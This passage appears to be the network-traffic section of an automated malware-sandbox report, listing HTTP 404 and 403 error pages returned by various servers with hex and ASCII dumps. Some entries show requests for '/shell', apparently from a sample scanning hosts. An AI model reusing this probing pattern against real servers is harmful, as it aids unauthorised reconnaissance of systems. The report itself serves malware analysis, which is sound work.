Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Mon, 01 Nov 2021 17:09:18 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 01 Nov 2021 17:09:17 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:16 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:20 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 31 0d 0a 28 6e 6f 6e 65 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:22 GMTServer: LiteSpeedData Raw: 32 37 36 31 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:25 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:13:03 GMTServer: Apache/2.2.27 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 37 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.27 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:25 GMTServer: Apache/2.4.34 (Ubuntu)Content-Length: 278Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 34 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.34 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: b7a4a90-990f-9817-78e4-c045e1d89b2eDate: Mon, 01 Nov 2021 09:09:55 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 62 37 61 34 61 39 30 2d 39 39 30 66 2d 39 38 31 37 2d 37 38 65 34 2d 63 30 34 35 65 31 64 38 39 62 32 65 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">b7a4a90-990f-9817-78e4-c045e1d89b2e</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
